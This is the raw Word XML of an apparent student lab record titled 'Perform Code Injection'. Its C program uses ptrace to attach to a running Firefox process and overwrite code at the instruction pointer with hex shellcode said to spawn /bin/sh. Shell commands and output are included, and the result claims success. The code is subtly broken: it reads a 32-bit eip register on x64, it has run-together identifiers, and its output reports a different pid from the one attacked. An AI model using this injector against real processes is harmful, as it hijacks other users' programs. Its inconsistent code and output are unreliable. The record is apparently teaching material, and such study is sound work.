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603240</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="line">
                  <wp:posOffset>1006475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6419851" cy="19050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1" cy="1905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47.5pt;margin-top:79.2pt;width:505.5pt;height:1.5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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>EXPT NO:12                                                                                  ROLL NO: 22070120</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body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 xml:space="preserve">  PERFORM CODE INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:before="90" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="140" w:firstLine="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90" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="14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AIM:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:before="8" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="85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 do process code injection on Firefox using ptrace system call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before="90" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="140" w:firstLine="0"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:kern w:val="36"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36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ALGORITHM:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="137"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Find out the pid of the running Firefox program.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="139"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 the code injection file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="137"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Get the pid of the Firefox from the command line arguments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="139"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Allocate memory buffers for the shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="137"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Attach to the victim process with PTRACE_ATTACH.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="140"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Get the register values of the attached process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="136"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 PTRACE_POKETEXT to insert the shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="140"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Detach from the victim process using PTRACE_DETACH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ind w:left="140" w:firstLine="0"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36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PROGRAM CODE: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/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="980000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:color="980000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="980000"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>INJECTOR PROGRAM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# include &lt;stdio.h&gt;//C standard input output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# include &lt;stdlib.h&gt;//C Standard General Utilities Library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# include &lt;string.h&gt;//C string lib header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# include &lt;unistd.h&gt;//standard symbolic constants and types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# include &lt;sys/wait.h&gt;//declarations for waiting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# include &lt;sys/ptrace.h&gt;//gives access to ptrace functionality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# include &lt;sys/user.h&gt;//gives ref to regs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//The shellcode that calls /bin/sh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char shellcode[]={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"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97"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"\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"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};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//header for our program.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void header()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printf("----Memory bytecode injector-----\n");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//main program notice we take command line options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int main(intargc,char**argv)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inti,size,pid=0;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structuser_regs_structreg;//struct that gives access to registers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                           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//note that this regs will be in x64 for me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                           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//unless your using 32bit then rip,eax,edx etc...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    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char*buff;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    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header();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    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//we get the command line options and assign them appropriately!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 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pid=atoi(argv[1]);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size=sizeof(shellcode);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//allocate a char size memory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buff=(char*)malloc(size);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//fill the buff memory with 0s upto size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memset(buff,0x0,size);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//copy shellcode from source to destination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memcpy(buff,shellcode,sizeof(shellcode));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    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//attach process of pid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ptrace(PTRACE_ATTACH,pid,0,0);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    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//wait for child to change state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wait((int*)0);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    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//get process pid registers i.e Copy the process pid's general-purpose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//or floating-point registers,respectively,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//to the address reg in the tracer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ptrace(PTRACE_GETREGS,pid,0,&amp;reg);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printf("Writing EIP 0x%x, process %d\n",reg.eip,pid);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    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//Copy the word data to the address buff in the process's memory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for(i=0;i&lt;size;i++){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ptrace(PTRACE_POKETEXT,pid,reg.eip+i,*(int*)(buff+i));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//detach from the process and free buff memory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ptrace(PTRACE_DETACH,pid,0,0);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free(buff);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return 0;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    </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:before="200" w:after="2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ind w:left="140" w:firstLine="0"/>
        <w:outlineLvl w:val="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kern w:val="36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ind w:left="140" w:firstLine="0"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36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OUTPUT:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="189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[root@localhost ~]# viinjector.c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Body"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="189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[root@localhost ~]# gccinjector.c -o injector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Body"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="189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[root@localhost ~]#ps -e|grepfirefox</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="6263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pt-PT" w:eastAsia="zh-TW"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="000000"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>1433 ?</w:t>
        <w:tab/>
        <w:t>00:01:23 firefox [root@localhost ~]# ./injector 1433</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="14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----Memory bytecode injector-----</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="52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Writing EIP 0x6, process 1707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Body"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="5220" w:firstLine="27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[root@localhost ~]#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44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>RESULT:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:before="8" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="850" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The implementation of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process code injection on Firefox using ptrace system call is executed successfully.</w:t>
      </w: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4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21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19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6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37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0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481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5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2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